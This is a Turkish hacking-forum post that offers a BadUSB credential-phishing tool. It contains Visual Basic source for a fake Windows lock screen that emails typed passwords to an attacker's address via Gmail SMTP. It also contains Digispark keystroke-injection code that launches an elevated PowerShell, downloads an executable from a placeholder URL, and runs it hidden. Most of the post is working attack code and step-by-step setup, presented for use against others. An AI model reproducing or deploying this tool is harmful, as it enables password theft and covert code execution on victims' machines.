Windows 10 Fake Lock Screen Mail Sending - BadUSB Digispark

Klavye19

Katılımcı Üye
8 Ocak 2017
852
12
Windows 10 Fake Lock Screen Mail Sending - BadUSB Digispark

68747470733a2f2f692e68697a6c69726573696d2e636f6d2f4969356855782e706e67


68747470733a2f2f692e68697a6c69726573696d2e636f6d2f434f594b45632e706e67


Üst kısımdaki resimden de anlayacağınız Windows 7 ve Windows 10 için sahte bir login ekranıdır. Programı visual basic ile oluşturdum. Mantık programda textbox kısmına girilen herhangi bir yazıyı belirlediğimiz mail adresine göndermektir. Bu programı BadUSB ile birlikte kullanmak amaçlı oluşturdum ve BadUSB olarak Digispark kullandım.

Login ekranının tasarımı ve kodlaması tamamen bana ait.
Aynı şekilde Digispark kodlaması da bana ait.





Amaç


BadUSB yani Digispark bilgisayara takılır
Belirli kodlar çalışır
sahte login ekranı oluşur
Son olarak girilen şifre belirlediğimiz mail adresine gönderilir

Digispark ile ilgli bilgiye ulaşmak için: https://digistump.com/wiki/digispark bu adrese bakın

Sahte görüntü tamamen bir görseldir sadece TextBox ve Button olan kısım eklenmiştir butonun daha gerçekçi gözükmesi için PictureBox olarak ayarladım.

Programı Visual Studio 2013 Ultimate kullanarak hazırladım


Full tutorial


[ame="https://www.youtube.com/watch?v=O_5SceJYqDQ&lc=z23jgtoovuykifat4acdp43apwbd1bzpcc40lscxx1tw03c010c"]https://www.youtube.com/watch?v=O_5SceJYqDQ&lc=z23jgtoovuykifat4acdp43apwbd1bzpcc40lscxx1tw03c010c[/ame]

PROGRAMIN KAYNAK KODU

Kod:
NOT:

Kaynak kodlar içerisindeki belirttiğim kısımları kendinize göre doldurun sizden sadece mail adresi ve şifresi istenmekte

Kod:
Imports System.Net.Mail
Public Class Form1

    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load

    End Sub

    Private Sub PictureBox3_Click(sender As System.Object, e As System.EventArgs) Handles PictureBox3.Click
        Dim MyMailMessage As New MailMessage()

            Try
                MyMailMessage.From = New MailAddress("[email protected]")
                MyMailMessage.To.Add("[email protected]")
                MyMailMessage.Subject = TextBox1.Text
                MyMailMessage.Body = TextBox2.Text
                Dim SMTP As New SmtpClient("smtp.gmail.com")
                SMTP.Port = 587
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("[email protected]", "PAROLA")
                SMTP.Send(MyMailMessage)
                TextBox2.Text = ""
                Dim frm As New Form1
                frm.Show()

                Me.Close()
            Catch ex As Exception
            End Try
    End Sub

    Private Sub TextBox1_KeyDown(sender As Object, e As KeyEventArgs) Handles TextBox1.KeyDown
        If e.KeyCode = Keys.Enter Then
            Dim MyMailMessage As New MailMessage()
            MyMailMessage.From = New MailAddress("[email protected]")
            MyMailMessage.To.Add("[email protected]")
            MyMailMessage.Subject = TextBox1.Text
            MyMailMessage.Body = TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("[email protected]", "POROLA")
            SMTP.Send(MyMailMessage)
            TextBox2.Text = ""
            Dim frm As New Form1
            frm.Show()

            Me.Close()

        End If
    End Sub

    Private Sub TextBox1_TextChanged(sender As Object, e As EventArgs) Handles TextBox1.TextChanged


    End Sub

End Class

Kaynak kodlardan da görebileceğiniz gibi oldukça basit bir kodlamadır. Aynı kodları kullanarak win7 ve win10 görseli hazırladım Kodları ikinci defa yazmamın sebebi girilen texti hem enter tuşuna bastığında hem de ekrandaki ok işaretine bastığı zaman belirlediğimiz mail adresine göndermesi içindir.

Digispark kodları

Kod:
#define kbd_tr_tr
#include "DigiKeyboard.h"
**** setup() {
}

**** loop() {
//coder sefaoruc
//youtube youtube.com/siberdunya
//bu kodlar win10 için sahte bir login sayfası oluşturur
//fake lock screen win10
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("powershell Start-Process powershell -Verb runAs"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT ,KEY_Y);
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("Invoke-WebRequest -Uri ('DOWNLOAD_URL') -O C:/fakelock.exe"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print("powershell -windowstyle hidden 'C:/fakelock.exe'");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for (;;) {
/son/
}
}

Digispark kodlarını da bu şekilde oluşturdum

Mantık Powershell admin olarak başlatmak ve upload ettiğimiz win7 veya win10 exe dosyasını indirip çalıştırmaktır.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.